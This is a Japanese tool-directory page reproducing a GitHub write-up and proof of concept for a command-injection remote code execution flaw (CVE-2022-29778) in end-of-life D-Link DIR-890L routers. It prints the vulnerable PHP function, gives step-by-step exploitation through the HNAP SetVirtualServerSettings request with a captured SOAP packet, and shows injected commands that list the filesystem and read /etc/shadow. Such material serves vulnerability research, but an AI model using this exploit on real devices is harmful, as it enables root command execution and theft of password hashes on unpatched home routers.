Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
DIR-890L-1.20-RCE — D-Link DIR-890L RCE (CVE-2022-29778) の分析とPoC | Kitploit
ツール/GitHubGitHub/tyeyeah/dir-890l-1.20-rce
組み込みシステムセキュリティIoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール
GitHubtyeyeah/dir-890l-1.20-rce

DIR-890L-1.20-RCE

D-Link DIR-890L RCE (CVE-2022-29778) の分析とPoC

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

D-Link DIR-890L RCE

影響を受けるバージョン:<= v1.22B01 Hotfix(最新)

ファームウェア:こちら

このモデルはライフサイクルの終わりに達しています。これらの製品に関連するリソースは開発を終了し、サポートされなくなりました。 D-Link Systems, Inc. は、これらの製品を廃止し、ファームウェアのアップデートが提供される製品に置き換えることを推奨しています。

脆弱性

このファームウェアには、SetVirtualServerSettings.php 内に getWOLMAC 関数があります。

root@kitploit:~
function getWOLMAC($ipv4addr)
{
	$cmd = "scut -p ".$ipv4addr." -f 3 /proc/net/arp";
	setattr("/runtime/wakeonlan/mac", "get", $cmd);
	$mac = get("", "/runtime/wakeonlan/mac");
	del("/runtime/wakeonlan/mac");
	return $mac;
}

$cmd は $ipv4addr をフィルタリングせずに直接コマンドに連結しており、以下の場所で呼び出されます。

root@kitploit:~
		$ipv4addr = get("x", "LocalIPAddress");
        ...
		if($description == "Wake-On-Lan")
		{
			$wolmac = getWOLMAC($ipv4addr);
			set($vsvr_entry.":".$InDeX."/wakeonlan_mac", $wolmac);
		}

したがって、$description(仮想サーバー名に相当)を "Wake-On-Lan" に設定すると、仮想サーバー関連ページ /VirtualServer.html に RCE(リモートコード実行)が存在する可能性があります。

悪用方法

  • 認証が必要なので、まずログインします。 Login Home

  • 次に、パネルからはアクセスできない 仮想サーバーページ (/VirtualServer.html) にアクセスします。 Virtual Server

  • Wake-On-Lan という名前のルールを追加します。 Add rule Rule results

  • Save ボタンをクリックする前に burpsuite を起動し、次のパケットをキャプチャします: packet

root@kitploit:~
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetVirtualServerSettings"
HNAP_AUTH: A4A816AE6CF2AC5537B0EB390FFB591C 1436839665
Content-Length: 765
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/VirtualServer.html
Cookie: uid=ZeNYZag3Gw

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetVirtualServerSettings>
			<VirtualServerList>
				<VirtualServerInfo>
					<Enabled>true</Enabled>
					<VirtualServerDescription>Wake-On-Lan</VirtualServerDescription>
					<ExternalPort>1</ExternalPort>
					<InternalPort>1</InternalPort>
					<ProtocolType>TCP</ProtocolType>
					<ProtocolNumber>6</ProtocolNumber>
					<LocalIPAddress>192.168.0.100</LocalIPAddress>
					<ScheduleName></ScheduleName>
				</VirtualServerInfo>
			</VirtualServerList>
		</SetVirtualServerSettings>
	</soap:Body>
</soap:Envelope>
  • HTTP サーバーを準備します: python server

  • Repeater モジュールを使用して RCE(リモートコード実行)をテストします: burpsuite

  • すると、次の結果が得られます: result

  • コマンドインジェクションをテストし、/etc/shadow を読み取ります: command ls /busy/box result command ls /busybox -al result command cat /etc/shadow result

ツールをダウンロード